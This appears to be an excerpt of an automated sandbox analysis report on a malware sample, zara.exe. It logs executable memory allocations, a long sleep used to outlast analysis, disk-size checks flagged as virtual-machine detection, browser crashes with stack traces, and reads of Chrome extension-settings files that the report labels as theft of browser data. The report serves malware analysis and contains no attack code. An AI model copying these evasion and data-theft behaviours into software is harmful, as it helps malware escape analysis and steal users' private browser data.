NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ca0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 3028 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ac2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 3028 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 1216 region_size: 1642496 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 1216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 1216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 1216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 1216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 1216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 1216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 1216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

zara.exe tried to sleep 353 seconds, actually delayed analysis time by 352 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (13 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Feb. 13, 2024, 12:17 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (17 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 1216 crashed
Application Crash	Process chrome.exe with pid 1864 crashed
Application Crash	Process chrome.exe with pid 2876 crashed
Application Crash	Process chrome.exe with pid 2128 crashed
Application Crash	Process chrome.exe with pid 2832 crashed
Application Crash	Process firefox.exe with pid 3572 crashed
Application Crash	Process firefox.exe with pid 3784 crashed
Application Crash	Process firefox.exe with pid 3932 crashed
__exception__ Feb. 13, 2024, 12:19 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 108588596 registers.edi: 89853996 registers.eax: 108588596 registers.ebp: 108588676 registers.edx: 32 registers.ebx: 108588960 registers.esi: 2147746133 registers.ecx: 89847816	1	0	0
__exception__ Feb. 13, 2024, 12:19 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7171540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x717152ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x717f0ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 73260360 registers.edi: 1953561104 registers.eax: 73260360 registers.ebp: 73260440 registers.edx: 1 registers.ebx: 4751684 registers.esi: 2147746133 registers.ecx: 242400276	1	0	0
__exception__ Feb. 13, 2024, 12:18 p.m.	stacktrace: 0x5a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5a2e04 registers.r14: 196210592 registers.r15: 196211032 registers.rcx: 1412 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 79532448 registers.rsp: 196209768 registers.r11: 196214288 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1532 registers.r12: 32945424 registers.rbp: 196209904 registers.rdi: 32682672 registers.rax: 5910016 registers.r13: 196210464	1	0	0
__exception__ Feb. 13, 2024, 12:19 p.m.	stacktrace: 0x4a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a2e04 registers.r14: 190705776 registers.r15: 190706216 registers.rcx: 1280 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 79980656 registers.rsp: 190704952 registers.r11: 190709472 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1428 registers.r12: 32552144 registers.rbp: 190705088 registers.rdi: 32551888 registers.rax: 4861440 registers.r13: 190705648	1	0	0
__exception__ Feb. 13, 2024, 12:19 p.m.	stacktrace: 0x3a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x3a2e04 registers.r14: 183955008 registers.r15: 183955448 registers.rcx: 1164 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 80955536 registers.rsp: 183954184 registers.r11: 183958704 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1268 registers.r12: 33535264 registers.rbp: 183954320 registers.rdi: 33272512 registers.rax: 3812864 registers.r13: 183954880	1	0	0
__exception__ Feb. 13, 2024, 12:19 p.m.	stacktrace: 0x5a2e04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 c1 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5a2e04 registers.r14: 180087104 registers.r15: 180087544 registers.rcx: 1268 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 77997344 registers.rsp: 180086280 registers.r11: 180090800 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1292 registers.r12: 7648528 registers.rbp: 180086416 registers.rdi: 7385776 registers.rax: 5910016 registers.r13: 180086976	1	0	0
__exception__ Feb. 13, 2024, 12:18 p.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 9960480 registers.r15: 9959984 registers.rcx: 48 registers.rsi: 14750816 registers.r10: 0 registers.rbx: 0 registers.rsp: 9959032 registers.r11: 9961232 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 9959815 registers.rbp: 9959152 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0
__exception__ Feb. 13, 2024, 12:18 p.m.	stacktrace: 0xcd1f04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 10484336 registers.r15: 10483840 registers.rcx: 48 registers.rsi: 14707104 registers.r10: 0 registers.rbx: 0 registers.rsp: 10482888 registers.r11: 10485088 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 10483671 registers.rbp: 10483008 registers.rdi: 100 registers.rax: 13442816 registers.r13: 2	1	0	0
__exception__ Feb. 13, 2024, 12:19 p.m.	stacktrace: 0xcd1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 07 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8973336 registers.r15: 8791498200688 registers.rcx: 48 registers.rsi: 8791498132352 registers.r10: 0 registers.rbx: 0 registers.rsp: 8972968 registers.r11: 8976352 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 8796092887632 registers.r12: 14912944 registers.rbp: 8973088 registers.rdi: 65118240 registers.rax: 13442816 registers.r13: 8973928	1	0	0

Steals private information from local Internet browsers (50 out of 2325 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
